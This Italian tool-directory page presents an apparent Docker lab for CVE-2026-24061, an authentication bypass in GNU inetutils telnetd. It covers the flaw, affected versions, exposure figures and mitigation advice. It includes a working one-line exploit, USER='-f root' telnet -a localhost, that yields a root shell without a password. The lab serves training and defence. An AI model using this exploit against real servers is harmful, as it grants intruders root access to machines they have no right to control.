Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
telnet-inetutils-auth-bypass-CVE-2026-24061 — Questo è un semplice PoC che ti permette di evidenziare la gravità del bug Telnet attualmente in corso e attivamente sfruttato. Perché le persone usano ancora Telnet... non lo capisco. | Kitploit
Strumenti/GitHubGitHub/jakeswiz/telnet-inetutils-auth-bypass-cve-2026-24061
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubjakeswiz/telnet-inetutils-auth-bypass-cve-2026-24061

telnet-inetutils-auth-bypass-CVE-2026-24061

Questo è un semplice PoC che ti permette di evidenziare la gravità del bug Telnet attualmente in corso e attivamente sfruttato. Perché le persone usano ancora Telnet... non lo capisco.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
16 mesi faNon ancora revisionato

CVE-2026-24061: Bypass dell'autenticazione in GNU inetutils-telnetd

Un laboratorio Docker per dimostrare la CVE-2026-24061 — una vulnerabilità critica di bypass dell'autenticazione in GNU inetutils telnetd rimasta senza patch per 11 anni.

La Vulnerabilità

Telnetd passa la variabile d'ambiente USER direttamente a /usr/bin/login senza alcuna sanificazione. Il binario login dispone di un flag -f che salta l'autenticazione (pensato per sessioni già autenticate). Impostando USER='-f root', un attaccante inganna login facendogli concedere accesso root senza password.

Versioni interessate: GNU inetutils 1.9.3 (marzo 2015) fino alla 2.7 Punteggio CVSS: 9.8 (Critico) Correzione: Aggiornare a inetutils 2.8+

Avvio Rapido

root@kitploit:~
# Crea l'immagine
docker build -t telnetd-exploit .

# Avvia il container (ti porta in una shell come user1)
docker run --rm -it telnetd-exploit

# Exploit — ottieni root senza password
USER='-f root' telnet -a localhost

Ti ritroverai in una shell root. Esegui whoami per confermare.

Come Funziona

root@kitploit:~
1. Il client si connette con: USER='-f root' telnet -a localhost
2. telnetd riceve la variabile d'ambiente USER: "-f root"
3. telnetd esegue: /usr/bin/login -f root
4. login interpreta -f come "salta l'autenticazione, l'utente è già verificato"
5. L'attaccante ottiene una shell root — nessuna password richiesta

Perché Esiste -f

Il flag -f è legittimo — serve per scenari in cui un utente è già autenticato (ad esempio, da una sessione locale attendibile). Il bug è che telnetd non sanifica la variabile USER prima di passarla a login, consentendo ad attaccanti remoti di iniettare il flag.

Impatto

A gennaio 2026:

  • ~800.000 server Telnet esposti a livello globale (Shadowserver)
  • ~290.000 indicizzati su Shodan
  • Vulnerabilità attivamente sfruttata in natura (catalogo CISA KEV)

Perché Non Dovresti Usare Telnet

Anche senza questo bug, Telnet trasmette tutto in chiaro — incluse le password. Usa SSH.

ProtocolloCrittografiaAutenticazione
TelnetNessunaIn chiaro
SSHSìChiave/Password

File

root@kitploit:~
.
├── Dockerfile              # Crea il container Debian vulnerabile
├── docker-entrypoint.sh    # Avvia inetd, passa a user1
└── README.md

Mitigazione

  1. Aggiorna a GNU inetutils 2.8+
  2. Disabilita telnetd — blocca la porta 23
  3. Usa SSH — siamo nel 2026

Riferimenti

  • CVE-2026-24061
  • Avviso originale
  • Voce CISA KEV

Crediti

Laboratorio basato su leonjza/inetutils-telnetd-auth-bypass

Scarica lo strumento